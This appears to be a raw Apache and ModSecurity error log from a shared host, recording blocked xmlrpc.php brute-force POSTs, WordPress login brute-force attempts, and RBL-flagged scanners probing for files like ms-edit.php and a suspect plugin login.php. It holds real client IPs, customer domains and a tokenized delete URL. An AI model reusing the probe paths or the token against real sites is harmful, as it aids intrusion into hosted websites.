[Tue May 26 19:27:14.022765 2026] [security2:error] [pid 49598:tid 49737] [client 4.241.228.159:2348] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/file.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVjgAAAI4"]
[Tue May 26 19:27:14.033953 2026] [security2:error] [pid 49598:tid 49771] [client 102.164.188.174:6675] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "erp.azurmediatec.com"] [uri "/salaries/card.php"] [unique_id "ahWmuezJzkdc0WtdrwtVjQAAsFk"], referer: https://erp.azurmediatec.com/salaries/card.php?action=delete&token=f37c35c9de3ddfad11d25aef7fc4c9c6&id=26
[Tue May 26 19:27:14.597846 2026] [security2:error] [pid 49598:tid 49804] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVlAAAANE"]
[Tue May 26 19:27:14.709179 2026] [security2:error] [pid 49598:tid 49825] [client 91.245.236.124:52079] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVqQAAAOY"]
[Tue May 26 19:27:14.709308 2026] [security2:error] [pid 49598:tid 49825] [client 91.245.236.124:52079] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVqQAAAOY"]
[Tue May 26 19:27:15.175131 2026] [security2:error] [pid 49598:tid 49828] [client 20.192.3.167:13446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVqgAAAOk"]
[Tue May 26 19:27:15.475185 2026] [security2:error] [pid 49598:tid 49794] [client 91.245.236.124:24033] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmu-zJzkdc0WtdrwtVwgAAAMc"]
[Tue May 26 19:27:15.475321 2026] [security2:error] [pid 49598:tid 49794] [client 91.245.236.124:24033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmu-zJzkdc0WtdrwtVwgAAAMc"]
[Tue May 26 19:27:15.596969 2026] [security2:error] [pid 49598:tid 49778] [client 4.241.228.159:2350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/ms-edit.php"] [unique_id "ahWmu-zJzkdc0WtdrwtVwwAAALc"]
[Tue May 26 19:27:15.597099 2026] [security2:error] [pid 49598:tid 49778] [client 4.241.228.159:2350] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/ms-edit.php"] [unique_id "ahWmu-zJzkdc0WtdrwtVwwAAALc"]
[Tue May 26 19:27:16.111464 2026] [security2:error] [pid 49598:tid 49772] [client 20.192.3.167:13118] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/y.php"] [unique_id "ahWmvOzJzkdc0WtdrwtV1AAAALE"]
[Tue May 26 19:27:16.239014 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:39795] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvOzJzkdc0WtdrwtV3AAAAKg"]
[Tue May 26 19:27:16.239151 2026] [security2:error] [pid 49598:tid 49763] [client 91.245.236.124:39795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvOzJzkdc0WtdrwtV3AAAAKg"]
[Tue May 26 19:27:16.585373 2026] [security2:error] [pid 49598:tid 49823] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmvOzJzkdc0WtdrwtV2AAAAOQ"]
[Tue May 26 19:27:16.859550 2026] [security2:error] [pid 49598:tid 49690] [remote 123.30.233.13:50326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmvOzJzkdc0WtdrwtV5AAAkls"]
[Tue May 26 19:27:17.022941 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:24615] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvezJzkdc0WtdrwtV5gAAAPw"]
[Tue May 26 19:27:17.023134 2026] [security2:error] [pid 49598:tid 49847] [client 91.245.236.124:24615] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvezJzkdc0WtdrwtV5gAAAPw"]
[Tue May 26 19:27:17.784606 2026] [security2:error] [pid 49598:tid 49839] [client 91.245.236.124:54899] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvezJzkdc0WtdrwtV-gAAAPQ"]
[Tue May 26 19:27:17.784724 2026] [security2:error] [pid 49598:tid 49839] [client 91.245.236.124:54899] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvezJzkdc0WtdrwtV-gAAAPQ"]
[Tue May 26 19:27:17.876275 2026] [security2:error] [pid 49598:tid 49766] [client 4.241.228.159:2828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/simple.php"] [unique_id "ahWmvezJzkdc0WtdrwtV_AAAAKs"]
[Tue May 26 19:27:17.876392 2026] [security2:error] [pid 49598:tid 49766] [client 4.241.228.159:2828] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/simple.php"] [unique_id "ahWmvezJzkdc0WtdrwtV_AAAAKs"]
[Tue May 26 19:27:18.568255 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:21891] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvuzJzkdc0WtdrwtWCgAAAME"]
[Tue May 26 19:27:18.568455 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:21891] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmvuzJzkdc0WtdrwtWCgAAAME"]
[Tue May 26 19:27:18.970922 2026] [security2:error] [pid 49598:tid 49775] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmvuzJzkdc0WtdrwtWCAAAALQ"]
[Tue May 26 19:27:19.331444 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:10547] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmv-zJzkdc0WtdrwtWIgAAAM4"]
[Tue May 26 19:27:19.331590 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:10547] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmv-zJzkdc0WtdrwtWIgAAAM4"]
[Tue May 26 19:27:20.509260 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:13355] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwOzJzkdc0WtdrwtWOgAAAMQ"]
[Tue May 26 19:27:20.509431 2026] [security2:error] [pid 49598:tid 49791] [client 91.245.236.124:13355] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwOzJzkdc0WtdrwtWOgAAAMQ"]
[Tue May 26 19:27:21.132926 2026] [security2:error] [pid 49598:tid 49728] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmwOzJzkdc0WtdrwtWRwAAAIU"]
[Tue May 26 19:27:21.286518 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:59549] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwezJzkdc0WtdrwtWVwAAAN0"]
[Tue May 26 19:27:21.286608 2026] [security2:error] [pid 49598:tid 49816] [client 91.245.236.124:59549] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwezJzkdc0WtdrwtWVwAAAN0"]
[Tue May 26 19:27:21.366512 2026] [security2:error] [pid 49598:tid 49757] [client 4.241.228.159:2360] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWmwezJzkdc0WtdrwtWWAAAAKI"]
[Tue May 26 19:27:21.366634 2026] [security2:error] [pid 49598:tid 49757] [client 4.241.228.159:2360] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWmwezJzkdc0WtdrwtWWAAAAKI"]
[Tue May 26 19:27:22.067487 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:64439] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWbwAAAMg"]
[Tue May 26 19:27:22.067646 2026] [security2:error] [pid 49598:tid 49795] [client 91.245.236.124:64439] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWbwAAAMg"]
[Tue May 26 19:27:22.660054 2026] [security2:error] [pid 49598:tid 49831] [client 18.192.166.72:2918] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWfwAAAOw"], referer: https://thegoodsporting.com
[Tue May 26 19:27:22.745792 2026] [security2:error] [pid 49598:tid 49786] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWdQAAAL8"]
[Tue May 26 19:27:22.839162 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:58999] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWgQAAANQ"]
[Tue May 26 19:27:22.839295 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:58999] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmwuzJzkdc0WtdrwtWgQAAANQ"]
[Tue May 26 19:27:23.620876 2026] [security2:error] [pid 49598:tid 49779] [client 91.245.236.124:52645] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmw-zJzkdc0WtdrwtWnQAAALg"]
[Tue May 26 19:27:23.621041 2026] [security2:error] [pid 49598:tid 49779] [client 91.245.236.124:52645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmw-zJzkdc0WtdrwtWnQAAALg"]
[Tue May 26 19:27:24.465756 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:55087] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxOzJzkdc0WtdrwtWsQAAAI8"]
[Tue May 26 19:27:24.465854 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:55087] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxOzJzkdc0WtdrwtWsQAAAI8"]
[Tue May 26 19:27:24.827086 2026] [security2:error] [pid 49598:tid 49798] [client 4.241.228.159:2822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/404.php"] [unique_id "ahWmxOzJzkdc0WtdrwtWugAAAMs"]
[Tue May 26 19:27:24.827192 2026] [security2:error] [pid 49598:tid 49798] [client 4.241.228.159:2822] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/404.php"] [unique_id "ahWmxOzJzkdc0WtdrwtWugAAAMs"]
[Tue May 26 19:27:25.234090 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:14623] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxezJzkdc0WtdrwtWxwAAANQ"]
[Tue May 26 19:27:25.234201 2026] [security2:error] [pid 49598:tid 49807] [client 91.245.236.124:14623] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxezJzkdc0WtdrwtWxwAAANQ"]
[Tue May 26 19:27:25.659256 2026] [security2:error] [pid 49598:tid 49775] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmxezJzkdc0WtdrwtWxAAAALQ"]
[Tue May 26 19:27:26.016340 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:25199] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW2wAAAIg"]
[Tue May 26 19:27:26.016452 2026] [security2:error] [pid 49598:tid 49731] [client 91.245.236.124:25199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW2wAAAIg"]
[Tue May 26 19:27:26.514614 2026] [security2:error] [pid 49598:tid 49746] [client 4.241.228.159:2342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/file3.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW6QAAAJc"]
[Tue May 26 19:27:26.514732 2026] [security2:error] [pid 49598:tid 49746] [client 4.241.228.159:2342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/file3.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW6QAAAJc"]
[Tue May 26 19:27:26.796729 2026] [security2:error] [pid 49598:tid 49853] [client 91.245.236.124:15609] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW8AAAAQI"]
[Tue May 26 19:27:26.796868 2026] [security2:error] [pid 49598:tid 49853] [client 91.245.236.124:15609] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmxuzJzkdc0WtdrwtW8AAAAQI"]
[Tue May 26 19:27:27.027517 2026] [autoindex:error] [pid 49598:tid 49728] [client 129.226.217.17:52522] AH01276: Cannot serve directory /home2/svijakqj/masonicarkfoundation.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:27:27.580827 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:53551] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmx-zJzkdc0WtdrwtXEQAAAPU"]
[Tue May 26 19:27:27.580952 2026] [security2:error] [pid 49598:tid 49840] [client 91.245.236.124:53551] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmx-zJzkdc0WtdrwtXEQAAAPU"]
[Tue May 26 19:27:27.796263 2026] [security2:error] [pid 49598:tid 49819] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmx-zJzkdc0WtdrwtXDQAAAOA"]
[Tue May 26 19:27:28.202433 2026] [security2:error] [pid 49598:tid 49829] [client 4.241.228.159:2340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp-mail.php"] [unique_id "ahWmyOzJzkdc0WtdrwtXJwAAAOo"]
[Tue May 26 19:27:28.202521 2026] [security2:error] [pid 49598:tid 49829] [client 4.241.228.159:2340] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp-mail.php"] [unique_id "ahWmyOzJzkdc0WtdrwtXJwAAAOo"]
[Tue May 26 19:27:28.349088 2026] [security2:error] [pid 49598:tid 49746] [client 91.245.236.124:13341] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyOzJzkdc0WtdrwtXLgAAAJc"]
[Tue May 26 19:27:28.349205 2026] [security2:error] [pid 49598:tid 49746] [client 91.245.236.124:13341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyOzJzkdc0WtdrwtXLgAAAJc"]
[Tue May 26 19:27:28.447555 2026] [security2:error] [pid 49598:tid 49615] [remote 216.251.35.203:59164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWmyOzJzkdc0WtdrwtXKAAAwRA"]
[Tue May 26 19:27:29.126185 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:46661] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyezJzkdc0WtdrwtXQQAAAKE"]
[Tue May 26 19:27:29.126324 2026] [security2:error] [pid 49598:tid 49756] [client 91.245.236.124:46661] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyezJzkdc0WtdrwtXQQAAAKE"]
[Tue May 26 19:27:29.913421 2026] [security2:error] [pid 49598:tid 49824] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmyezJzkdc0WtdrwtXUAAAAOU"]
[Tue May 26 19:27:29.988745 2026] [security2:error] [pid 49598:tid 49742] [client 91.245.236.124:19193] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyezJzkdc0WtdrwtXWgAAAJM"]
[Tue May 26 19:27:29.988846 2026] [security2:error] [pid 49598:tid 49742] [client 91.245.236.124:19193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmyezJzkdc0WtdrwtXWgAAAJM"]
[Tue May 26 19:27:30.058448 2026] [fcgid:warn] [pid 49598:tid 49800] (70014)End of file found: [client 195.184.76.245:34989] mod_fcgid: can't get data from http client
